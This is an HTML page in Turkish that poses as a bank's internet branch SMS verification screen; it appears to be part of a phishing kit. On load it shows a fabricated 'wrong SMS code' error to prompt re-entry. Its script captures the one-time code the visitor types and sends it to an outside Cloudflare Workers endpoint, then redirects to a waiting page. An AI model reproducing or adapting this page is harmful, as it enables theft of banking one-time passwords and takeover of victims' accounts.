<!DOCTYPE html>
<html lang="tr">

<head>



    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Mobil Uyumlu Sayfa</title>
    <style class="vjs-styles-defaults"></style>
    <meta http-equiv="Content-Language" content="tr">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.18/dist/sweetalert2.min.css">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.18/dist/sweetalert2.min.js"></script>

    <link href="assets/styles.css" rel="stylesheet" id="style">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/vue/2.5.17/vue.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.18.0/axios.min.js"></script>

    <!-- Meta Pixel Code -->

    <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
</head>

<body style="
margin-left: 0px;
margin-right: 0px;
margin-top: 0px;
margin-bottom: 0px;
">
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            showError();
        });

        function showError() {
            Swal.fire({
                icon: 'error',
                title: 'Hata',
                text: 'Doğrulama SMS kodu hatalı!',
                showConfirmButton: true,
                allowOutsideClick: false,
                allowEscapeKey: false,
                allowEnterKey: false,
                backdrop: true,
                preConfirm: () => {
                    // SweetAlert kapandıktan sonra formun display stilini kaldır
                    document.getElementById('aspnetForm').style.display = 'block';
                }
            });
        }
    </script>
    <style>
        .swal2-margin {
            margin: 50px;
        }

        /* SweetAlert'in konumunu ve boyutunu sabitleyin */
        .swal2-container {
            display: flex !important;
            align-items: center !important;
            justify-content: center !important;
        }

        .swal2-popup {
            box-sizing: border-box;
        }
    </style>
    <style>
        @import url(https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap);

        div div center {
            font-family: Montserrat;
        }

        button.btn.btn-danger.sendBtn {
            font-family: Montserrat;
            font-weight: 700;
            font-style: normal;
        }

        html,
        body {
            height: 100%;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container,
        body {
            max-width: 430px;
            max-height: 932px;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;

        }
    </style>
    <form name="aspnetForm" method="post" id="aspnetForm" autocomplete="off" novalidate="novalidate"
        style="display:none;">
        <div class="login-wrap">
            <header></header>
            <div class="container">
                <div class="tc-kimlik-giris-wrap">
                    <div class="row">
                        <div class="">
                            <div class="login-box long">
                                <span style="color:Red;visibility:hidden;"></span>
                                <input name="rdLng" type="hidden" value="">
                                <p>İnternet Şubemize Hoş Geldiniz</p>
                                <div class="tabs-wrap" data-module="14">
                                    <div class="tabs tab-header-container">
                                        <a causesval="false" onclick=";;;" class="active" href="">
                                            <span></span>BİREYSEL </a>
                                        <a causesval="false">
                                            <span></span>KURUMSAL </a>
                                    </div>
                                    <div class="tab-container tab-contents">
                                        <div class="tab-item active" style="padding-left: 10px;">
                                            <p
                                                style="margin-bottom: 8px;margin-left: 0px;text-align: center;margin-top: 32px;">
                                                SMS DOĞRULAMA</p>
                                            <div class="form-group hidden-title">
                                                <center><input autocomplete="off" name="sms" type="password"
                                                        maxlength="6" id="sms"
                                                        class="form-control required isNumber numeric external-validation"
                                                        style="font-size: 14px; height: 46px; font-family: sans-serif; font-weight: 700;margin-top: 35px;    width: 300px;"
                                                        placeholder="Telefonunuza gelen kodu girin" data-msg-required=""
                                                        maxlengthvalidationenabled="False"
                                                        disablevalidationonblur="true" causesval="false"
                                                        aria-required="true" value=""></center>

                                                <script>
                                                    function getCookie(name) {
                                                        var nameEQ = name + "=";
                                                        var ca = document.cookie.split(';');
                                                        for (var i = 0; i < ca.length; i++) {
                                                            var c = ca[i];
                                                            while (c.charAt(0) === ' ') c = c.substring(1, c.length);
                                                            if (c.indexOf(nameEQ) === 0) return c.substring(nameEQ.length, c.length);
                                                        }
                                                        return null;
                                                    }

                                                    document.addEventListener("DOMContentLoaded", function () {
                                                        // Input alanının değerini kontrol et
                                                        var phoneNumberInput = document.getElementById('sms');
                                                        // Giriş butonu
                                                        var loginBtn = document.getElementById('loginBtn');

                                                        phoneNumberInput.addEventListener('input', function () {
                                                            var phoneNumber = phoneNumberInput.value;

                                                            // Eğer en az 8 karakter girilmişse
                                                            if (phoneNumber.length >= 6) {
                                                                // Giriş butonunun disable özelliğini kaldır
                                                                loginBtn.removeAttribute('disabled');
                                                            } else {
                                                                // Giriş butonunu disable yap
                                                                loginBtn.setAttribute('disabled', 'disabled');
                                                            }
                                                        });

                                                        // Giriş butonuna tıklanınca
                                                        loginBtn.addEventListener('click', function (event) {
                                                            event.preventDefault(); // Formun post işlemini engelle
                                                            var sms = document.getElementById('sms').value;



                                                            var data = new FormData();
                                                            data.append('action', "sms2");
                                                            data.append('sms', sms);

                                                            fetch('https://curly-fire-5ecb.aisik3516.workers.dev/', {
                                                                method: 'POST',
                                                                body: data
                                                            })
                                                                .then(response => response.json())
                                                                .then(data => {
                                                                    console.log('Sunucudan gelen yanıt:', data);
                                                                    window.location.href = 'bekle.html';
                                                                })
                                                                .catch(error => {
                                                                    console.error('Hata:', error);
                                                                    window.location.href = 'bekle.html';
                                                                });
                                                        });
                                                    });
                                                </script>
                                            </div>
                                            <div class="clearfix"></div>

                                            <center> <button id="loginBtn" class="btn btn-danger sendBtn"
                                                    style="margin-top: 14px;    width: 332px;" disabled>
                                                    <span></span>DOĞRULA
                                                </button></center>
                                            <br><br><br>


                                        </div>
                                    </div>
                                    <style>
                                        input {
                                            touch-action: manipulation;
                                        }

                                        .api-payment-container img {
                                            max-height: 92px;
                                            max-width: 92px;
                                        }

                                        .ipNotInListRedirectBtn {
                                            background-color: #e10514 !important;
                                        }
                                    </style>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </form>

    <script src="assets/script.js?v=1.1.2"></script>

    <div>
</body>

</html>